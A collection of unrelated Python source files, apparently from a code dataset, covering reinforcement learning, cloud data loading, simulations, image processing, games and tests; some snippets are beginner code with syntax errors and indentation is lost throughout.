def trpo(env, args):
dtype = torch.double
torch.set_default_dtype(dtype)
# env = gym.make(args.env_name)
num_inputs = env.observation_space.shape[0]
num_actions = env.action_space.shape[0]
env.seed(args.seed)
torch.manual_seed(args.seed)
policy_net = Policy(num_inputs, num_actions, hidden_sizes = (args.hidden_size,) * args.num_layers)
# print("Network structure:")
# for name, param in policy_net.named_parameters():
# print("name: {}, size: {}".format(name, param.size()[0]))
# flat_param = parameters_to_vector(policy_net.parameters())
# matrix_dim = flat_param.size()[0]
# print("number of total parameters: {}".format(matrix_dim))
value_net = Value(num_inputs)
batch_size = args.teacher_batch_size
running_state = ZFilter((env.observation_space.shape[0],), clip=5)
agents = AgentCollection(env, policy_net, 'cpu', running_state=running_state, render=args.render,
num_agents=args.agent_count, num_parallel_workers=args.num_workers)
def trpo_loss(advantages, states, actions, params, params_trpo_ls):
# This is the negative trpo objective
with torch.no_grad():
set_flat_params_to(policy_net, params)
log_prob_prev = policy_net.get_log_prob(states, actions)
set_flat_params_to(policy_net, params_trpo_ls)
log_prob_current = policy_net.get_log_prob(states, actions)
negative_trpo_objs = -advantages * torch.exp(log_prob_current - log_prob_prev)
negative_trpo_obj = negative_trpo_objs.mean()
set_flat_params_to(policy_net, params)
return negative_trpo_obj
def compute_kl(states, prev_params, xnew):
with torch.autograd.no_grad():
set_flat_params_to(policy_net, prev_params)
pi = policy_net(Variable(states))
set_flat_params_to(policy_net, xnew)
pi_new = policy_net(Variable(states))
set_flat_params_to(policy_net, prev_params)
kl = torch.mean(kl_divergence(pi, pi_new))
return kl
for i_episode in count(1):
losses = []
# Sample Trajectories
# print('Episode {}. Sampling trajectories...'.format(i_episode))
# time_begin = time()
memories, logs = agents.collect_samples(batch_size)
# time_sample = time() - time_begin
# print('Episode {}. Sampling trajectories is done, using time {}.'.format(i_episode, time_sample))
# Process Trajectories
# print('Episode {}. Processing trajectories...'.format(i_episode))
# time_begin = time()
advantages_list, returns_list, states_list, actions_list = \
estimate_advantages_parallel(memories, value_net, args.gamma, args.tau)
# time_process = time() - time_begin
# print('Episode {}. Processing trajectories is done, using time {}'.format(i_episode, time_process))
# Computing Policy Gradient
# print('Episode {}. Computing policy gradients...'.format(i_episode))
# time_begin = time()
policy_gradients, value_net_update_params = compute_policy_gradient_parallel(policy_net, value_net, states_list, actions_list, returns_list, advantages_list)
pg = np.array(policy_gradients).mean(axis=0)
pg = torch.from_numpy(pg)
value_net_average_params = np.array(value_net_update_params).mean(axis=0)
value_net_average_params = torch.from_numpy(value_net_average_params)
vector_to_parameters(value_net_average_params, value_net.parameters())
# time_pg = time() - time_begin
# print('Episode {}. Computing policy gradients is done, using time {}.'.format(i_episode, time_pg))
# Computing Conjugate Gradient
# print('Episode {}. Computing the harmonic mean of natural gradient directions...'.format(i_episode))
fullstep = conjugate_gradient_global(policy_net, states_list, pg,
args.max_kl, args.cg_damping, args.cg_iter)
# Linear Search
# print('Episode {}. Linear search...'.format(i_episode))
# time_begin = time()
prev_params = get_flat_params_from(policy_net)
for advantages, states, actions in zip(advantages_list, states_list, actions_list):
losses.append(trpo_loss(advantages, states, actions, prev_params, prev_params).detach().numpy())
fval = np.array(losses).mean()
# ls_flag = False
for (n_backtracks, stepfrac) in enumerate(0.5 ** np.arange(10)):
new_losses = []
kls = []
xnew = prev_params + stepfrac * fullstep
for advantages, states, actions in zip(advantages_list, states_list, actions_list):
new_losses.append(trpo_loss(advantages, states, actions, prev_params, xnew).data)
kls.append(compute_kl(states, prev_params, xnew).detach().numpy())
new_loss = np.array(new_losses).mean()
kl = np.array(kls).mean()
# print(new_loss - fval, kl)
if new_loss - fval < 0 and kl < args.max_kl:
set_flat_params_to(policy_net, xnew)
# writer.add_scalar("n_backtracks", n_backtracks, i_episode)
ls_flag = True
break
# time_ls = time() - time_begin
# if ls_flag:
# print('Episode {}. Linear search is done in {} steps, using time {}'
# .format(i_episode, n_backtracks, time_ls))
# else:
# print('Episode {}. Linear search is done but failed, using time {}'
# .format(i_episode, time_ls))
rewards = [log['avg_reward'] for log in logs]
average_reward = np.array(rewards).mean()
if i_episode % args.log_interval == 0:
print('Episode {}. Average reward {:.2f}'.format(
i_episode, average_reward))
if i_episode > args.num_teacher_episodes:
break
return policy_net
|
19,271 | 04e2fe2af58bb52427f2875d0d9f177c5f0dec96 | # -*- coding: utf-8 -*-
from __future__ import division
a=in(input('digite moedas:))
b=in(input('digite moedas:))
c=in(input('cedulass:))
while c>0:
if c>=a:
x=c//a
if c>=b:
y=c//b
if c%x==0:
print(x)
print(y)
|
19,272 | 17a3dc06bf77b485764626a7e721848bc13f17e5 | # This function takes the path of the universe.db file
# and transforms it into a list which can be easily processed
def read_routes(path):
import sqlite3
connection = sqlite3.connect(path)
cursor = connection.cursor()
cursor.execute("SELECT ORIGIN, DESTINATION, TRAVEL_TIME FROM ROUTES;")
results = cursor.fetchall()
routes = []
for r in results:
routes.append(r)
cursor.close()
connection.close()
return (routes)
# This function reads the millenium-falcon.json file
# and returns the autonomy and the routes file as a list
def read_millenium_falcon(path):
import json
millenium_falcon = json.load(open(path))
if ('autonomy' not in millenium_falcon.keys()) or ('routes_db' not in millenium_falcon.keys()):
return (0, [])
else:
autonomy = millenium_falcon['autonomy']
routes = read_routes(millenium_falcon['routes_db'])
return (autonomy, routes)
# The 3 following functions are used to compute all of the possible
# paths between Tatooine and Endore according to the universe.db file
# This first function creates an initial list of
# path between Tatooine and the reachable planet from Tatooine
# according to the routes list
def initialisation (routes):
paths = []
for el in routes:
if el[0] == 'Tatooine':
paths.append([(el[0], 0), (el[1], el[2])])
return paths
# This function returns True once all of the paths
# have been computed
def all_paths_bool (paths):
counter = 0
for el in paths:
if el[-1][0] != 'Endor':
return False
return True
# This function takes the list of route previously
# processed (from the universe.db file) and retourn
# all of the different paths as a list of list.
# Each list of the list is a path composed of tuples (str(Planet Name), int(day to reach it))
def create_all_paths (routes):
final_paths = []
previous_paths = initialisation(routes)
while not(all_paths_bool(previous_paths)):
new_multiple_paths = []
for path in previous_paths:
for option in routes:
if path[-1][0] == option[0]:
virgin_path = list(path)
virgin_path.append((option[1], path[-1][1] + option[2]))
if virgin_path[-1][0] == 'Endor':
final_paths.append(virgin_path)
new_multiple_paths.append(virgin_path)
previous_paths = list(new_multiple_paths)
return final_paths
# This function reads the empire-json.file
# and returns the countdown and the map of the hunters
def read_empire(path):
import json
empire = json.loads(open(path).read())
if ('countdown' not in empire.keys()) or ('bounty_hunters' not in empire.keys()):
return (0, [])
else:
countdown = empire['countdown']
hunters = []
for el in empire['bounty_hunters']:
hunters.append((el['planet'], el['day']))
return (countdown, hunters) |
19,273 | 790bed6d87505e3afdc004c48ec75815d8bac6fe | from collections import deque
list=[1,2,3,4,5]
print(list[len(list)-1])
list.pop(0)
print(list) |
19,274 | 9cb2d424e37b9ffdfc1230a193649f72ef1eaaaa | from google.cloud import pubsub_v1
from google.cloud import storage
from google.cloud import bigquery
from google.auth.exceptions import DefaultCredentialsError
from google.api_core.exceptions import AlreadyExists
import time, csv, json
# Setup configurations
try:
with open("config.json") as f:
config = json.loads(f.read(), encoding="UTF-8")
except Exception as e:
raise Exception("Invalid configuration setup. Please validate if config.json is setup properly")
# Setup storage and pubsub clients
try:
storage_client = storage.Client()
subscriber = pubsub_v1.SubscriberClient()
bq_client = bigquery.Client()
except DefaultCredentialsError as e:
raise Exception("Invalid login credentials. Please make sure GOOGLE_APPLICATION_CREDENTIALS is setup")
except Exception as e:
raise e
def callback(message):
try:
message.ack()
bucket_info = json.loads(message.data, encoding="UTF-8")
keys = read_file_contents(json.loads(message.data, encoding="UTF-8"))
load_dataset_bq(bucket_info, keys)
except KeyError as e:
raise Exception("Please check the data published to pub_sub. One of the keys referenced does not exist")
except Exception as e:
print("Some error", type(e) ,e )
def load_dataset_bq(bucket_info, keys):
try:
print(bucket_info)
print(keys)
uri = 'gs://{}/{}'.format(bucket_info.get("bucket"), bucket_info.get("name"))
dataset_id = bucket_info.get("name").replace(".", "_")
dataset = bigquery.Dataset(bq_client.dataset(dataset_id))
bq_client.create_dataset(dataset)
print("dataset_id {}".format(dataset_id))
dataset_ref = bq_client.dataset(dataset_id)
print("uri is {}".format(uri))
job_config = bigquery.LoadJobConfig()
job_config.schema = [bigquery.SchemaField(items, "STRING") for items in keys]
job_config.skip_leading_rows = 1
job_config.source_format = bigquery.SourceFormat.CSV
job_config.field_delimiter = ";"
load_job = bq_client.load_table_from_uri(
uri,
dataset_ref.table(dataset_id),
job_config=job_config
)
print('Starting job {}'.format(load_job.job_id))
load_job.result() # Waits for table load to complete.
print('Job finished.')
destination_table = bq_client.get_table(dataset_id)
print('Loaded {} rows.'.format(destination_table.num_rows))
except KeyError as ex:
print("BQ : ", ex)
# Stream the contents of the csv file to pubsub for example
def read_file_contents(bucket_info):
try:
print(bucket_info)
bucket = storage_client.get_bucket(bucket_info.get("bucket"))
blob = bucket.get_blob(bucket_info.get("name"))
if blob is not None and blob.content_type == "text/csv":
lines = blob.download_as_string().decode().split("\n")
reader = csv.DictReader(lines, delimiter=";")
for row in reader:
if row and row is not None:
# print(row['meterpoint_id'])
print()
return row.keys()
else:
raise Exception("Invalid file type. We only support csv files")
except Exception as e:
print("Error parsing the file", e)
print(e.args)
def subscribe_to_source_topic():
# Create the subscription
try:
project_id = config.get("PROJECT_ID")
source_topic = config.get("SOURCE_TOPIC")
topic_subscriber = config.get("SOURCE_TOPIC_SUBSCRIBER")
if project_id and source_topic and topic_subscriber:
topic = subscriber.topic_path(project_id, source_topic)
path = subscriber.subscription_path(project_id, topic_subscriber)
subscriber.create_subscription(path, topic)
else:
raise Exception("Configuration properties not set")
except KeyError:
print("Invalid configuration keys")
raise Exception("Trying to access wrong key from configuration. Please check your configuration access")
except KeyboardInterrupt as e:
print("Manual Interruption")
except AlreadyExists as e:
print("You are trying to create an existing subscription. Please change the name for your subscriber")
subscriber.subscribe(path, callback=callback)
print('Listening for messages on {}'.format(path))
while True:
time.sleep(10)
subscribe_to_source_topic()
|
19,275 | 999db0bb9e2b84b0d0775202cf8fc4e4a96afdbb | import cv2
fname='/home/yuto/Documents/AIhub/download.jpeg'
original=cv2.imread(fname,cv2.IMREAD_COLOR)
b,g,r=cv2.split(original)
original[:,:,0]=0 # there are three color channel so, it allows only two channel to make yellow picture
cv2.imshow('Image',original)
cv2.imwrite('file3.png',original)
cv2.waitKey(0)
cv2.destroyAllWindows() |
19,276 | 9e21fd60fecdb4e57a3f8c5f8397746a73646a09 | #!/usr/bin/env python3
__appname__ = '[assembly.py]'
__author__ = 'Pablo Lechon (plechon@ucm.es)'
__version__ = '0.0.1'
## IMPORTS ##
import sys
from model import *
import itertools
from functions import *
import pandas as pd
import progressbar
## CONSTANTS ##
global seed; seed = 69
## FUNCTIONS ##
def main(argv):
'''Main function'''
#Environment with s strains and m metabolites
m = 60
s = 60
#Partition families
n_fam = 4
n_memb = 15
#Create a dictionary of parameters
params = {'g':np.ones(s).reshape(s,1),
's':s,
'm':m,
'K':20*np.ones(m).reshape(m,1),
't':0.5*np.ones(m).reshape(m,1),
'coal':0 #This is not a coalescence event
}
#Create time vector
tspan = tuple([1, 1e4])
#Set initial conditions
z0 = list(np.ones(s))+list(2*np.ones(m))
#Create parameter vectors
beta = np.linspace(5, 5, num = 1, dtype = int)
nr = np.linspace(1, 5, 2, dtype = int)
kc = np.linspace(0, 0.9, num = 3)
kf = np.linspace(0.01, 0.99, num = 3)
Kc = np.linspace(0.1, 0.9, num = 3)
Kf = np.linspace(0.1, 0.9, num = 3)
#l = np.array([0.5])
l = np.array([0.2, 0.5, 0.9])
#l = np.array([0.1, 0.2, 0.3, 0.4, 0.50,
# 0.50, 0.6, 0.7, 0.8, 0.9])
#l = np.array([0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.50,
# 0.50, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95])
nsim = range(2)
#Create N-D parameter grid
product = itertools.product(beta, kc, kf, Kc, Kf, l, nsim)
#Create column names of data frame
col_names = ['beta', 'kc', 'kf', 'Kc', 'Kf', 'l', 'n_sim']
#Create dataframe for storing parameter values and simulation results
df = pd.DataFrame(data = np.array(list(product)), columns = col_names)
#Preallocate columns for C0 and F0 calculations
ncol = len(df)
df['C0'] = np.zeros(ncol)
df['F0'] = np.zeros(ncol)
df['C0tot'] = np.zeros(ncol)
df['C0av'] = np.zeros(ncol)
df['C0bav'] = np.zeros(ncol)
df['C0b1av'] = np.zeros(ncol)
df['F0tot'] = np.zeros(ncol)
df['F0av'] = np.zeros(ncol)
#Preallocate columns for C and F calculations (after community assembly)
df['C'] = np.zeros(ncol)
df['F'] = np.zeros(ncol)
df['Ctot'] = np.zeros(ncol)
df['Cav'] = np.zeros(ncol)
df['Cbav'] = np.zeros(ncol)
df['Cb1av'] = np.zeros(ncol)
df['Ftot'] = np.zeros(ncol)
df['Fav'] = np.zeros(ncol)
#Preallocate column for richness
df['r'] = np.zeros(ncol, dtype = int)
#Preallocate harvest factors
df['B'] = np.zeros(ncol)
df['Fin'] = np.zeros(ncol)
#Preallocate average abundance and average pathway number vectors
df['av_ab'] = np.zeros(ncol)
df['av_path'] = np.zeros(ncol)
df['std_dem'] = np.zeros(ncol)
#Preallocate columns for preference and metabolic matrices
all_c = pd.DataFrame(data = np.zeros(shape = (s*ncol, m + 1), dtype = int))
#Note that I add one column at the end to specify wether that species is
#extinct or not after assembly.
all_D = pd.DataFrame(data = np.zeros(shape = (m*ncol, m)))
all_abundances = pd.DataFrame(data = np.zeros(shape = (ncol, s)))
#Set indices to number each community
all_c = all_c.set_index(np.repeat(np.arange(ncol), s))
all_D = all_D.set_index(np.repeat(np.arange(ncol), m))
#Check the signs
plus = 0
minus = 0
#Run simulations across the parameter grid
for i in progressbar.progressbar(range(ncol)):
#c = preference_matrix(m, s, df['kc'][i],
# beta = df['beta'][i], n_r = None)
#c = preferences_matrix(df['kc'][i], m, n_memb, n_fam, s)
#Create vector of species classes
sc_vec = np.repeat(np.arange(n_fam), n_memb)
#Draw preference matrix and metabolic matrix
c = gen_pref_matrix(0, df['kc'][i], m, n_memb, sc_vec, sc_vec)
#Compute demands as the sum of the rows of c
demands = np.sum(c, axis = 0)
#Sample metabolic matrix
Dant = crossfeeding_matrix(demands, m, df['kf'][i])
#Get matrix of classes
Mc = class_matrix(m, n_fam)
D = metabolic_matrix(kf = df['kf'][i], s = 0.05, M = Mc, Mc = n_memb,
m = m)
#D = general_metabolic_matrix(0.05, df['kf'][i], demands,
# 0, Mc, m, n_memb)
#Store in dataframe
all_D[m*i:m*(i+1)]= D
#Compute costs
maint_vec = maintenance(c)
#Calculate facilitation cycling
F_cy = community_facilitation(c, c, D, df['l'][i], df['l'][i])
C_cy = community_competition(c, c, D, df['l'][i], df['l'][i])
#Calculate competition and facilitation matrices of the community
#before the assembly
C = interaction_matrix(df['l'][i], c, D,
interaction = 'competition')
F = interaction_matrix(df['l'][i], c, D,
interaction = 'facilitation')
##Check the frequency of Cii' > Fii'
#check = (C - F).reshape(1, s**2)
#plus += sum((check > 0)[0])
#minus += sum((check < 0)[0])
#if i > 8000:
# import ipdb; ipdb.set_trace(context = 20)
#Average non-zero elements to get community level facilitation and
#competition leaving out the 0 of the diagonal
df.loc[i, 'C0'] = np.sum(C)/(np.size(C)-len(np.diag(C)))
df.loc[i, 'F0'] = np.sum(F)/(np.size(F)-len(np.diag(F)))
df.loc[i, 'F0tot'] = F_cy[0]
df.loc[i, 'C0tot'] = C_cy[0]
df.loc[i, 'F0av'] = F_cy[1]
df.loc[i, 'C0av'] = C_cy[1]
df.loc[i, 'C0bav'] = C_cy[2]
#Calculate cost of each species
maint_vec = maintenance(c)
#Add sampled strategies, metabolic, costs, and leakage
#to the parameter dictionary
params['D'] = D
params['c'] = c
params['x'] = maint_vec.reshape(s,1)
params['l'] = df['l'][i]*np.ones(m).reshape(m,1)
#Solve diferential equations
sol = solve_ivp(lambda t,z: equations(t,z, params),
tspan, z0,
method = 'BDF', atol = 0.0001 )
#Get abundance of species at stable state
stable_abundance = sol.y[0:s,-1]
#Store in dataframe
all_abundances.iloc[i] = stable_abundance
#Get indices of extant species
ind_extant = np.where(stable_abundance > 1)[0]
#Create a vector of extant species
extant = -1*np.ones(shape = (s, 1))
#Flip to 1 the extant ones
extant[ind_extant] = 1
c_tot = np.hstack([c, extant])
#Store in data frame
all_c[s*i:s*(i+1)] = c_tot
#Get average abundance of extant species
av_abundance = np.mean(stable_abundance[ind_extant])
#Store average abundance
df.loc[i, 'av_ab'] = av_abundance
#Store community richness
df.loc[i, 'r'] = len(ind_extant)
#Get rid of these rows in the matrix of preferences
c_assembly = c[ind_extant,:]
#Get average number of pathways in the community
av_pathways = np.mean(np.sum(c_assembly, axis = 1))
#Store
df.loc[i, 'av_path'] = av_pathways
#Get rid of these rows in the vector of costs
maint_assembly = maint_vec[ind_extant]
#Get total demand of each resource
demands = np.sum(c_assembly, axis = 0)
#Store its standard deviation
df.loc[i, 'std_dem'] = np.std(demands)
#Calculate average terms of the effective harvest
B = potential_harvest(df['l'][i], c_assembly, demands)
Fplus = facilitation_in(df['l'][i], c_assembly, None, D, demands)
#Store in data frame
df.loc[i,'B'] = B
df.loc[i,'Fin'] = Fplus
#Recalculate facilitation and competititon community-level indices
F = interaction_matrix(df['l'][i], c_assembly, D,
interaction = 'facilitation')
C = interaction_matrix(df['l'][i], c_assembly, D,
interaction = 'competition')
#Recalculate facilitation cycling
F_cy = community_facilitation(c_assembly, c_assembly, D,
df['l'][i], df['l'][i])
C_cy = community_competition(c_assembly, c_assembly, D,
df['l'][i], df['l'][i])
#Average non-zero elements to get community level facilitation and
#competition leaving out the 0 of the diagonal
df.loc[i, 'C'] = np.sum(C)/(np.size(C)-len(np.diag(C)))
df.loc[i, 'F'] = np.sum(F)/(np.size(F)-len(np.diag(F)))
df.loc[i, 'Ftot'] = F_cy[0]
df.loc[i, 'Ctot'] = C_cy[0]
df.loc[i, 'Fav'] = F_cy[0]
df.loc[i, 'Cav'] = C_cy[1]
df.loc[i, 'Cbav'] = C_cy[2]
if df['l'][i] == 0.9:
import ipdb; ipdb.set_trace(context = 20)
#Save results
if len(sys.argv) > 1:
df.to_csv('../data/simulation_results_'+sys.argv[1]+'.csv',
index = False)
all_c.to_csv('../data/c_matrices_'+sys.argv[1]+'.csv')
all_D.to_csv('../data/D_matrices_'+sys.argv[1]+'.csv')
all_abundances.to_csv('../data/abundances_'+sys.argv[1]+'.csv')
else:
df.to_csv('../data/simulation_results.csv', index = False)
all_c.to_csv('../data/c_matrices.csv')
all_D.to_csv('../data/D_matrices.csv')
all_abundances.to_csv('../data/abundances.csv')
return 0
## CODE ##
if (__name__ == '__main__'):
status = main(sys.argv)
sys.exit(status)
|
19,277 | 006b4d9e27960133df60a52ed319d322bf0289ef | import turtle
from math import sqrt
def drawpixel(x, y):
turtle.up()
turtle.goto(x, y)
turtle.dot(3)
def ellipse(a, b):
x = 0
y = b
d1 = b * b + a * a * (0.25 - b)
drawpixel(x,y)
drawpixel(-x, y)
drawpixel(-x, -y)
drawpixel(x, -y)
while(b * b * (x + 1) < a * a * (y-0.5)):
if d1 < 0:
d1 += b * b * (2 * x + 3)
x += 1
else:
d1 += b * b * (2 * x + 3) + a * a * (3 - 2 * y)
x += 1
y -= 1
drawpixel(x,y)
drawpixel(-x, y)
drawpixel(-x, -y)
drawpixel(x, -y)
d2 = sqrt(b * (x + 0.5)) + sqrt(a * (y - 1)) - sqrt(a * b)
while y > 0:
if d2 < 0:
d2 += b * b * (2 * x + 2) + a * a * (-2 * y + 3)
x += 1
y -= 1
else:
d2 += a * a * (3 - 2 * y)
y -=1
drawpixel(x,y)
drawpixel(-x, y)
drawpixel(-x, -y)
drawpixel(x, -y)
def main():
a = int(input('请输入椭圆的长半径a:'))
b = int(input('请输入椭圆的短半径b:'))
turtle.pencolor('red')
turtle.hideturtle()
turtle.speed(0)
turtle.screensize(800, 600, 'white')
ellipse(a, b)
turtle.mainloop()
if __name__ == "__main__":
main() |
19,278 | 367600f8cdeede4e29bf340d2ff5862d0b6f9f1b | # Databricks notebook source
# MAGIC %md Azure Databricks notebooks by Rene Bremer
# MAGIC
# MAGIC Copyright (c) Microsoft Corporation. All rights reserved.
# MAGIC
# MAGIC Licensed under the MIT License.
# COMMAND ----------
import os
par_stor_name = dbutils.widgets.get("stor_name")
par_container_name = dbutils.widgets.get("container_name")
#par_private_link_dns = dbutils.widgets.get("private_link_dns")
os.environ['container'] = par_container_name
# COMMAND ----------
import socket
addr = socket.gethostbyname(par_stor_name + '.dfs.core.windows.net')
print(addr)
# COMMAND ----------
# Databricks notebook source
# "fs.azure.account.oauth2.client.secret": dbutils.secrets.get(scope="<scope-name>",key="<service-credential-key-name>"),
configs = {"fs.azure.account.auth.type": "OAuth",
"fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
"fs.azure.account.oauth2.client.id": dbutils.secrets.get(scope="dbrkeys",key="spn-id"),
"fs.azure.account.oauth2.client.secret": dbutils.secrets.get(scope="dbrkeys",key="spn-key"),
"fs.azure.account.oauth2.client.endpoint": "https://login.microsoftonline.com/" + dbutils.secrets.get(scope="dbrkeys",key="tenant-id") + "/oauth2/token"}
# Optionally, you can add <directory-name> to the source URI of your mount point.
dbutils.fs.mount(
source = "abfss://" + par_container_name +"@" + par_stor_name + ".dfs.core.windows.net/",
mount_point = "/mnt/" + par_container_name,
extra_configs = configs)
# COMMAND ----------
%sh
ls -l /dbfs/mnt/$container
# COMMAND ---------- |
19,279 | 2747f9fe5745ad1b30eba651aa20f0db8b586626 | from e47_circle import Circle
import pytest
@pytest.mark.parametrize('iterable, maxtimes, output', [
('abcd', 7, 'abcdabc'),
([10, 20, 30], 2, [10, 20]),
([10, 20, 30], 8, [10, 20, 30, 10, 20, 30, 10, 20]),
])
def test_circle(iterable, maxtimes, output):
assert list(Circle(iterable, maxtimes)) == list(output)
|
19,280 | f063f9f75dc795c17cae972d3fda097a36b3068e | from concurrent.futures.thread import ThreadPoolExecutor
from google.protobuf.empty_pb2 import Empty
import grpc
from shared_code.my_lib import start_insecure
from stubbed_code.shared_class import SharedClass
# pyright: reportUnknownMemberType = false
server = grpc.server(ThreadPoolExecutor(), handlers=None)
class OverrideClass2(SharedClass):
def GetStatus(self,
request: Empty,
context: grpc.ServicerContext,
) -> int: ...
# do even more special stuff
start_insecure("localhost:8080",server ) |
19,281 | 43a4ea94295fcb8024bb27ec23f5dc510b6c320e | from django.contrib.auth.models import User
from rest_framework import serializers
class OwnerSerializer(serializers.ModelSerializer):
class Meta:
fields = (
'id',
'username',
'email',
)
model = User
class EntrySerializer(serializers.Serializer):
count = serializers.SerializerMethodField()
lastModified = serializers.SerializerMethodField()
def get_count(self, obj):
return obj.count()
def get_lastModified(self, obj):
entries = obj.order_by('-modified_date')
return entries[0].modified_date if len(entries) else None
class UserSerializer(serializers.ModelSerializer):
entry = EntrySerializer(read_only=True, source="entries")
reminder = serializers.ReadOnlyField()
class Meta:
model = User
fields = ('id', 'username', 'entry', 'reminder')
|
19,282 | d5e628ac2bf735f16fed2abacb3fb93d90bf99ba | from day16_menu import Menu, MenuItem
from day16_coffee_maker import CoffeeMaker
from day16_money_machine import MoneyMachine
def main():
menu = Menu()
machine = CoffeeMaker()
cashier = MoneyMachine()
while True:
choice = input(f" What would you like? ({menu.get_items()}):")
if choice == 'report':
machine.report()
cashier.report()
elif choice == 'off':
exit()
elif menu.find_drink(choice):
drink = menu.find_drink(choice)
if machine.is_resource_sufficient(drink) and cashier.make_payment(drink.cost):
machine.make_coffee(drink)
if __name__ == "__main__":
main()
|
19,283 | c59562788b4f0876bfa61bf52572f1551e289431 | #!/usr/bin/env python
# This is a Python script that implements the first stage of classification: junction detection.
# Input:
# data: list of tuples with the first element in each tuple as an angle and the second a distance
# radians: boolean that indicates whether the input data is in radians
import math
import random
def alg_stage1(data, radians):
numPoints = len(data)
#print 'NumPoints:', numPoints
#Converts the angles to radians if inputted in degrees
if not radians:
for i in range(numPoints):
data[i] = (data[i][0]*math.pi/180.0, data[i][1])
#print 'Converted to Radians'
#Use the first and last point to find the horizontal distance
r_L0 = abs(data[numPoints-1][1]*math.cos(data[numPoints-1][0]))
r_R0 = abs(data[0][1]*math.cos(data[0][0]))
#print 'r_L0:', r_L0, ', r_R0:', r_R0
#Calculate the tolerance value based on the horizontal distances and the angle increment
deltheta = data[1][0] - data[0][0]
tol = deltheta*(r_L0 + r_R0);
#print 'tol:', tol
#Sets the initial booleans
junction = [False, False]
#For each angle
for i in range(numPoints):
#If on the right side of the pipe, calculate the distance value for a straight pipe
if data[i][0] < math.pi/2:
compare = r_R0/math.cos(data[i][0])
flag1 = 'right'
#If the left side of the pipe, calculate the distance value for a straight pipe
else:
compare = r_L0/math.cos(math.pi - data[i][0])
flag1 = 'left'
#Compute the absolute difference between the measured value and the expected
diff = abs(data[i][1] - abs(compare))
#print 'i:', i, ', theta:', data[i][0]*180/math.pi, flag1, ', diff:', diff
#If the difference is greater than the tolerance or if the angle is close to the vertical
#We only care about discrepencies on the sides, not near the vertical
if diff > tol and abs(data[i][0]-math.pi/2) > 10*math.pi/180:
#Set that you have found a discrepency on the specific side of the pipe
if flag1 == 'left':
junction[0] = True
else:
junction[1] = True
#if junction[0] or junction[1]:
#print 'Junction Detected'
#else:
#print 'Straight Pipe Ahead'
return junction
|
19,284 | eaa9109b8e691104f67eb563ba12130bd185ce9a | from t2imageObject import imageObject
from t2tools import Console
class AutoImage(imageObject):
"""docstring for AutoImage"""
# 本类是对于imageObject特异化的类
# 用于自主对于分数的控制
def __init__(self, env, name, src=None, objects=None, png=False):
super(AutoImage, self).__init__(src, objects, png)
self.env = env
self.downspeed = 1000 # 每speed秒向下移动一格
self.downdeltatime=0 # 积累时间用
self.name=name #数组是根据这个判定点击是否正确的
self.flag=True # True指的是未到销毁的时候。一旦到底部,就会显示为False,从而被销毁。
# self.isControl=False # 这里是说,False时是不受drawDown
# self.
#这其实是一种特效
#但是携带了下落到底端时会扣分的功能
def drawDown(self, deltatime,screen):
self.downdeltatime+=deltatime
# if self.isAlphain==False:
# self.alphain(deltatime)
# print(self.name)
if self.downdeltatime*1000>self.downspeed and self.isExplodeStart==False:
if self.y>=self.env['screenHeight']:
self.flag=False
#掉出世界扣100
self.env['score']-=100
else:
self.transY(60)
self.downdeltatime=0
self.draw(screen)
if self.y>400:
self.flashme(200,deltatime)
self.explode(deltatime)
#这个函数需要场景配合
#在event下方放置outImage的event函数。outImage会从栈的后方向前搜索,按下的按钮如果存在
#就会消除并加分,如果搜索完也没找到,就会扣分
#消除的话就会找到这个函数,这个函数写该图片被点击后的效果,可以在这里写特效
def imgEventClick(self,event):
if event.key==Console.getkeyCode(self.name):
self.env['score']+=100
self.isExplodeStart=True
# print('进来了!!!!!')
return True
else:
return False
|
19,285 | 0507cf3399549b5c91b3dd7501b145ac70c150b7 | from django.contrib import admin
from Userreg.models import UserProfileInfo,User,Event
# Register your models here.
admin.site.register(UserProfileInfo) |
19,286 | 6adcd3b87ab58454fc9eed6cc5842a76091e0fab | # -*- coding: utf-8 -*-
import pandas as pd
import jieba
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfVectorizer
from gensim import corpora, models
import gensim
from nltk.tokenize import RegexpTokenizer
from itertools import compress
import datetime
import glob, os
import csv
import json
import datetime
from utils import notification
tmp_all=[]
tmp_all.append(['title','date','url','n_hate','content_split'])
for data_file in glob.glob("files_contend/*.json"):
print data_file
json_data=open(data_file).read()
data = json.loads(json_data)
i = 0
for post in data:
tmp=[]
if u'新聞' in post['title'] and u'Re: [新聞]' not in post['title'] and u'Fw: [新聞]' not in post['title']:
print post['title'].encode('utf-8')
try:
tmp.append(post['title'].encode('utf-8'))
tmp.append(post['date'])
tmp.append(post['url'])
tmp.append(" ".join(jieba.cut(post['content'], cut_all=False)).encode('utf-8'))
tmp_all.append(tmp)
except:
print("except")
with open("all_documents.csv", "wb") as f:
writer = csv.writer(f)
writer.writerows(tmp_all)
notification.notification('the transfer of json to csv is ready')
|
19,287 | fbfa9c2ebb9d19810443de8bce746d986b4c6f11 | import pandas as pd
import numpy as np
import pytest
import mock
from fixtures import Store
from data import create_config
from collector.tasks.clean_national_dataset.task import CleanNationalDataset
from collector.schema import ValidationError
class TestCleanNationalDatasetRun:
@property
def config(self):
return create_config()
@mock.patch.object(CleanNationalDataset, "run")
def test_run_valid_input(self, mock_run):
task = CleanNationalDataset(self.config["collector"], Store())
task(input_folder="raw", output_folder="processed")
mock_run.assert_called_once_with(
{"input_folder": "raw", "output_folder": "processed"}
)
@pytest.mark.parametrize(
"inputs,messages",
[
(
{},
[
"'input_folder' is a required property",
"'output_folder' is a required property",
],
),
(
{"input_folder": 1, "output_folder": 1},
["1 is not of type 'string'", "1 is not of type 'string'",],
),
(
{"input-folder": 1, "output-folder": 1},
[
"'input_folder' is a required property",
"'output_folder' is a required property",
],
),
],
)
@mock.patch.object(CleanNationalDataset, "run")
def test_run_invalid_input(self, mock_run, inputs, messages):
task = CleanNationalDataset(self.config["collector"], Store())
with pytest.raises(ValidationError) as error:
task(**inputs)
mock_run.assert_not_called()
for (idx, error) in enumerate(error.value.errors):
assert error.message == messages[idx]
@mock.patch.object(Store, "list")
@mock.patch.object(CleanNationalDataset, "_read")
@mock.patch.object(CleanNationalDataset, "_write")
def test_run(self, mock_write, mock_read, mock_list):
mock_list.return_value = ["raw/1970-01-01.csv"]
mock_read.return_value = pd.DataFrame(
{"PositiefGetest": [1000], "Opgenomen": [2000], "Overleden": [3000]}
)
